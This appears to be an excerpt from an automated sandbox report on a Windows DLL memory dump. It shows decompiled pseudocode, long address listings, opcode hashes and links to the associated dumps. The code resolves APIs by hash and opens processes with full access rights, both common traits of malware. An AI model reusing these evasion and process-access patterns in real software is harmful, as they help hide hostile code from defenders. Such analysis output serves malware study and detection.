				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6ECFF4E0( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6ECFF4E0( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6ECFF4E0( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6ECFF678( &_v316);
				return E6ECFF678( &_v356);
			}

0x6ecf1494
0x6ecf1498
0x6ecf149d
0x6ecf14a3
0x6ecf14ab
0x6ecf14b0
0x6ecf14bc
0x6ecf14c0
0x6ecf14d2
0x6ecf14e8
0x6ecf14f3
0x6ecf14f4
0x6ecf14f5
0x6ecf14f6
0x6ecf14f7
0x6ecf14fa
0x6ecf14fe
0x6ecf1502
0x6ecf1509
0x6ecf151b
0x6ecf1531
0x6ecf153c
0x6ecf153d
0x6ecf153e
0x6ecf153f
0x6ecf1540
0x6ecf1543
0x6ecf1547
0x6ecf154b
0x6ecf1552
0x6ecf1564
0x6ecf157a
0x6ecf1585
0x6ecf1586
0x6ecf1587
0x6ecf1588
0x6ecf1589
0x6ecf158c
0x6ecf1590
0x6ecf1594
0x6ecf159b
0x6ecf15ad
0x6ecf15c3
0x6ecf15ce
0x6ecf15cf
0x6ecf15d0
0x6ecf15d1
0x6ecf15d2
0x6ecf15d5
0x6ecf15d9
0x6ecf15dd
0x6ecf15e4
0x6ecf15f6
0x6ecf160c
0x6ecf1617
0x6ecf1618
0x6ecf1619
0x6ecf161a
0x6ecf161b
0x6ecf161e
0x6ecf1622
0x6ecf1626
0x6ecf162d
0x6ecf163f
0x6ecf1655
0x6ecf1660
0x6ecf1661
0x6ecf1662
0x6ecf1663
0x6ecf1664
0x6ecf1667
0x6ecf166b
0x6ecf166f
0x6ecf1676
0x6ecf1688
0x6ecf169e
0x6ecf16a9
0x6ecf16aa
0x6ecf16ab
0x6ecf16ac
0x6ecf16ad
0x6ecf16b0
0x6ecf16b4
0x6ecf16b8
0x6ecf16bf
0x6ecf16d1
0x6ecf16e7
0x6ecf16f2
0x6ecf16f3
0x6ecf16f4
0x6ecf16f5
0x6ecf16f6
0x6ecf16f9
0x6ecf16fd
0x6ecf1701
0x6ecf1708
0x6ecf171a
0x6ecf1730
0x6ecf173b
0x6ecf173c
0x6ecf173d
0x6ecf173e
0x6ecf173f
0x6ecf1742
0x6ecf1746
0x6ecf174a
0x6ecf1751
0x6ecf1763
0x6ecf1779
0x6ecf1784
0x6ecf1785
0x6ecf1786
0x6ecf1787
0x6ecf1788
0x6ecf178b
0x6ecf178f
0x6ecf1793
0x6ecf179a
0x6ecf17ac
0x6ecf17c2
0x6ecf17cd
0x6ecf17ce
0x6ecf17cf
0x6ecf17d0
0x6ecf17d1
0x6ecf17d4
0x6ecf17d8
0x6ecf17dc
0x6ecf17e3
0x6ecf17f5
0x6ecf180b
0x6ecf1816
0x6ecf1817
0x6ecf1818
0x6ecf1819
0x6ecf181a
0x6ecf181d
0x6ecf1821
0x6ecf1825
0x6ecf182c
0x6ecf183e
0x6ecf1854
0x6ecf185f
0x6ecf1860
0x6ecf1861
0x6ecf1862
0x6ecf1863
0x6ecf1866
0x6ecf186a
0x6ecf186e
0x6ecf1875
0x6ecf1887
0x6ecf189d
0x6ecf18a8
0x6ecf18a9
0x6ecf18aa
0x6ecf18ab
0x6ecf18ac
0x6ecf18af
0x6ecf18b3
0x6ecf18b7
0x6ecf18be
0x6ecf18d0
0x6ecf18e6
0x6ecf18f1
0x6ecf18f2
0x6ecf18f3
0x6ecf18f4
0x6ecf18f5
0x6ecf18f8
0x6ecf18fc
0x6ecf1900
0x6ecf1907
0x6ecf1919
0x6ecf192f
0x6ecf193a
0x6ecf193b
0x6ecf193c
0x6ecf193d
0x6ecf193e
0x6ecf1941
0x6ecf1945
0x6ecf1949
0x6ecf1950
0x6ecf1962
0x6ecf1978
0x6ecf1983
0x6ecf1984
0x6ecf1985
0x6ecf1986
0x6ecf198c
0x6ecf198f
0x6ecf1991
0x6ecf199c
0x6ecf19a3
0x6ecf19ac
0x6ecf19b4
0x6ecf19bb
0x6ecf19c4
0x6ecf19cc
0x6ecf19d3
0x6ecf19dc
0x6ecf19e4
0x6ecf19eb
0x6ecf19f4
0x6ecf19fc
0x6ecf1a03
0x6ecf1a0c
0x6ecf1a14
0x6ecf1a1b
0x6ecf1a24
0x6ecf1a2c
0x6ecf1a36
0x6ecf1a3f
0x6ecf1a47
0x6ecf1a51
0x6ecf1a5a
0x6ecf1a62
0x6ecf1a6c
0x6ecf1a75
0x6ecf1a7d
0x6ecf1a87
0x6ecf1a90
0x6ecf1a98
0x6ecf1aa2
0x6ecf1aab
0x6ecf1ab3
0x6ecf1abd
0x6ecf1ac6
0x6ecf1ace
0x6ecf1ad8
0x6ecf1ae1
0x6ecf1ae9
0x6ecf1af3
0x6ecf1afc
0x6ecf1b04
0x6ecf1b0e
0x6ecf1b17
0x6ecf1b1f
0x6ecf1b26
0x6ecf1b2f
0x6ecf1b37
0x6ecf1b3e
0x6ecf1b43
0x6ecf1b51
0x6ecf1b55
0x6ecf1b64
0x6ecf1b6d
0x6ecf1b72
0x6ecf1b79
0x6ecf1b7d
0x6ecf1b81
0x6ecf1b88
0x6ecf1b9a
0x6ecf1bb0
0x6ecf1bbb
0x6ecf1bbc
0x6ecf1bbd
0x6ecf1bbe
0x6ecf1bbf
0x6ecf1bc2
0x6ecf1bc6
0x6ecf1bca
0x6ecf1bd1
0x6ecf1be3
0x6ecf1bf9
0x6ecf1c04
0x6ecf1c05
0x6ecf1c06
0x6ecf1c07
0x6ecf1c08
0x6ecf1c0b
0x6ecf1c0f
0x6ecf1c13
0x6ecf1c1a
0x6ecf1c2c
0x6ecf1c42
0x6ecf1c4d
0x6ecf1c4e
0x6ecf1c4f
0x6ecf1c50
0x6ecf1c51
0x6ecf1c54
0x6ecf1c58
0x6ecf1c5c
0x6ecf1c63
0x6ecf1c75
0x6ecf1c8b
0x6ecf1c96
0x6ecf1c97
0x6ecf1c98
0x6ecf1c99
0x6ecf1c9a
0x6ecf1c9d
0x6ecf1ca0
0x6ecf1ca1
0x6ecf1ca2
0x6ecf1ca9
0x6ecf1cac
0x6ecf1cb7
0x6ecf1cbe
0x6ecf1cc7
0x6ecf1ccf
0x6ecf1cd6
0x6ecf1cdf
0x6ecf1ce7
0x6ecf1cee
0x6ecf1cf7
0x6ecf1cff
0x6ecf1d04
0x6ecf1d0d
0x6ecf1d15
0x6ecf1d2a

Strings

g , xrefs: 6ECF17DC

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction ID: 91802ff7e917b308152f631ca3e3effac99c2c5c3e46befbb15e9648c911ab5c
Opcode Fuzzy Hash: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction Fuzzy Hash: 74329472404745DECB15DF64C851AEF77A8EFA230CF208B1DB8895B2A1FF71A986C641

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFA52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6ECFA52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6ECFB69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6ECFF4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6ECFF678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6ED0223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6ECFF678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6ECFF5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6ECFF5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ed0b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6ED0303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6ECFB608(_t439 + 0x34);
											E6ECFB608(_t439 + 8);
											goto L65;
										}
										L62:
										E6ECFB608(_t439 + 0x34);
										E6ECFB608(_t439 + 8);
										goto L63;
									}
									_t392 = E6ECFF4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6ECFCAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6ECFC2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E6ECFF84C(_t439 + 0x14, E6ECFF4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6ECFF4E0(_t439 + 0x14, E6ECFF4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6ED0303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6ECFF84C(_t439 + 0x40, E6ECFF4F0(_t439 + 0x3c) + 4);
											 *(E6ECFF4E0(_t439 + 0x40, E6ECFF4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6ECFCD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6ECFF4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6ECFAC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6ECFCD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6ECFF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6ECFF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6ED038C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6ECFF84C( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6ECFF4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6ECFF4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E6ED038C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6ECFF4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6ECFF84C( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6ECFF84C( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6ECFF84C( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 4);
								 *(E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6ECFF4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6ED0303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6ECFF4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6ECFF84C( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6ECFF4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E6ECFF84C( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 4);
										 *(E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6ECFF4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6ECFF4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E6ED038C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6ECFF4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6ECFF84C( *((intOrPtr*)(_t439 + 4)), E6ECFF4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6ED0303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6ECFF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6ECFF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6ECFF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6ECFF4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E6ED038C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6ECFF84C( *((intOrPtr*)(_t439 + 8)), E6ECFF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6ECFF4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6ecfa536
0x6ecfa538
0x6ecfa543
0x6ecfa549
0x6ecfa54d
0x6ecfa552
0x6ecfa558
0x6ecfa568
0x00000000
0x6ecfa56a
0x6ecfa56a
0x6ecfa575
0x6ecfa575
0x6ecfaaf3
0x6ecfaaf5
0x6ecfaaf6
0x6ecfab35
0x6ecfab39
0x6ecfab47
0x6ecfab55
0x6ecfab55
0x6ecfab40
0x6ecfab5b
0x6ecfab60
0x00000000
0x6ecfab60
0x6ecfab44
0x6ecfab45
0x00000000
0x6ecfa57f
0x6ecfa57f
0x6ecfa583
0x6ecfa68a
0x6ecfa68a
0x6ecfa68f
0x6ecfa7a0
0x6ecfa7a4
0x6ecfa7a9
0x6ecfa7ad
0x6ecfa8d7
0x6ecfa8d9
0x6ecfa8dd
0x6ecfa8e6
0x6ecfa8ef
0x6ecfa8f3
0x6ecfa8fc
0x6ecfa903
0x6ecfa904
0x6ecfa908
0x6ecfa90c
0x6ecfa910
0x6ecfa912
0x6ecfaa7c
0x6ecfaa7c
0x6ecfaa84
0x6ecfaa9c
0x6ecfaa9e
0x6ecfaaa0
0x6ecfaada
0x6ecfaada
0x6ecfaadc
0x6ecfaadc
0x6ecfaadf
0x6ecfaafa
0x6ecfab0e
0x6ecfab11
0x6ecfab16
0x6ecfab21
0x6ecfab22
0x6ecfab25
0x6ecfab27
0x6ecfab30
0x00000000
0x6ecfab30
0x6ecfaae1
0x6ecfaae5
0x6ecfaaee
0x00000000
0x6ecfaaee
0x6ecfaab1
0x6ecfaac1
0x6ecfaac5
0x6ecfaac5
0x6ecfaac8
0x6ecfaacb
0x6ecfaace
0x6ecfaad4
0x00000000
0x00000000
0x00000000
0x6ecfaad6
0x6ecfa91a
0x6ecfa91a
0x6ecfa91c
0x6ecfa920
0x6ecfa925
0x6ecfa927
0x6ecfa92b
0x6ecfa92e
0x6ecfa936
0x6ecfa938
0x00000000
0x00000000
0x6ecfa94f
0x6ecfa96a
0x6ecfa96c
0x6ecfa97f
0x6ecfa981
0x6ecfa983
0x6ecfa99e
0x6ecfa99e
0x6ecfa9a2
0x6ecfa9a4
0x00000000
0x00000000
0x6ecfa9a6
0x6ecfa9a9
0x6ecfa9ca
0x6ecfa9e9
0x6ecfa9ef
0x6ecfa9f2
0x6ecfa9f7
0x6ecfa9f8
0x6ecfa9fc
0x00000000
0x00000000
0x6ecfaa04
0x6ecfaa04
0x6ecfaa06
0x6ecfaa12
0x6ecfaa1e
0x6ecfaa28
0x6ecfaa2b
0x6ecfaa2e
0x6ecfaa32
0x6ecfaa39
0x6ecfaa3d
0x6ecfaa41
0x6ecfaa42
0x6ecfaa46
0x6ecfaa4b
0x6ecfaa50
0x6ecfaa54
0x6ecfaa58
0x6ecfaa5e
0x6ecfaa64
0x6ecfaa6a
0x6ecfaa70
0x6ecfaa75
0x6ecfaa76
0x6ecfaa76
0x00000000
0x6ecfaa06
0x00000000
0x6ecfa9a9
0x6ecfa987
0x6ecfa998
0x6ecfa99a
0x6ecfa99c
0x00000000
0x00000000
0x00000000
0x6ecfa99c
0x6ecfa9af
0x00000000
0x6ecfa9af
0x6ecfa7b3
0x6ecfa7b6
0x6ecfa7b8
0x00000000
0x00000000
0x6ecfa7c0
0x6ecfa7c0
0x6ecfa7c2
0x6ecfa7c2
0x6ecfa7d3
0x6ecfa7d5
0x6ecfa7d8
0x00000000
0x00000000
0x6ecfa8ce
0x6ecfa8cf
0x6ecfa8d1
0x00000000
0x00000000
0x00000000
0x6ecfa8d1
0x6ecfa7de
0x6ecfa7e1
0x6ecfa7eb
0x6ecfa7f0
0x6ecfa7f2
0x6ecfa7f8
0x6ecfa7ff
0x6ecfa803
0x6ecfa808
0x6ecfa80c
0x6ecfac47
0x6ecfac5b
0x6ecfac7e
0x6ecfac83
0x6ecfac83
0x6ecfa823
0x6ecfa828
0x6ecfa828
0x6ecfa828
0x6ecfa828
0x6ecfa82e
0x6ecfa833
0x6ecfa835
0x6ecfa83a
0x6ecfa841
0x6ecfa846
0x6ecfa848
0x6ecfac05
0x6ecfac16
0x6ecfac30
0x6ecfac35
0x6ecfac35
0x6ecfa85e
0x6ecfa863
0x6ecfa863
0x6ecfa863
0x6ecfa863
0x6ecfa877
0x6ecfa895
0x6ecfa89a
0x6ecfa8aa
0x6ecfa8c7
0x6ecfa8c9
0x6ecfa8c9
0x00000000
0x6ecfa7e1
0x6ecfa697
0x6ecfa697
0x6ecfa699
0x6ecfa6a0
0x6ecfa6ae
0x6ecfa6b0
0x6ecfa6b3
0x6ecfa6ba
0x6ecfa6bc
0x6ecfa6ed
0x6ecfa6fc
0x6ecfa6fe
0x6ecfa700
0x6ecfa71e
0x6ecfa720
0x6ecfa722
0x6ecfa735
0x6ecfa754
0x6ecfa75a
0x6ecfa75d
0x6ecfa774
0x6ecfa790
0x6ecfa792
0x6ecfa792
0x6ecfa792
0x6ecfa792
0x6ecfa722
0x00000000
0x6ecfa700
0x6ecfa6c0
0x6ecfa6c0
0x6ecfa6c2
0x6ecfa6d3
0x6ecfa6d5
0x6ecfa6d7
0x00000000
0x00000000
0x6ecfa6e3
0x6ecfa6e4
0x6ecfa6eb
0x00000000
0x00000000
0x00000000
0x6ecfa6eb
0x6ecfa6d9
0x6ecfa6dc
0x00000000
0x00000000
0x6ecfa795
0x6ecfa795
0x6ecfa796
0x6ecfa796
0x00000000
0x6ecfa589
0x6ecfa58b
0x6ecfa58b
0x6ecfa58d
0x6ecfa594
0x6ecfa5a2
0x6ecfa5a4
0x6ecfa5a8
0x6ecfa5ac
0x6ecfa5ae
0x6ecfa5dc
0x6ecfa5df
0x6ecfa5e4
0x6ecfa5e8
0x6ecfa5ed
0x6ecfa5f4
0x6ecfa5f9
0x6ecfa5fb
0x6ecfabc2
0x6ecfabd3
0x6ecfabf3
0x6ecfabf8
0x6ecfabf8
0x6ecfa611
0x6ecfa616
0x6ecfa616
0x6ecfa616
0x6ecfa616
0x6ecfa628
0x6ecfa62a
0x6ecfa62c
0x6ecfa63d
0x6ecfa63d
0x6ecfa643
0x6ecfa648
0x6ecfa64c
0x6ecfa652
0x6ecfa659
0x6ecfa65e
0x6ecfa660
0x6ecfab76
0x6ecfab87
0x6ecfaba8
0x6ecfabad
0x6ecfabad
0x6ecfa677
0x6ecfa67c
0x6ecfa67c
0x6ecfa67c
0x6ecfa67c
0x6ecfa67f
0x6ecfa67f
0x00000000
0x6ecfa67f
0x6ecfa5b2
0x6ecfa5b2
0x6ecfa5b4
0x6ecfa5c5
0x6ecfa5c7
0x6ecfa5c9
0x00000000
0x00000000
0x6ecfa5d5
0x6ecfa5d6
0x6ecfa5da
0x00000000
0x00000000
0x00000000
0x6ecfa5da
0x6ecfa5cb
0x6ecfa5ce
0x00000000
0x00000000
0x6ecfa680
0x6ecfa680
0x6ecfa681
0x6ecfa681
0x00000000
0x6ecfa58d
0x6ecfa583

Strings

, xrefs: 6ECFAB3B

Memory Dump Source

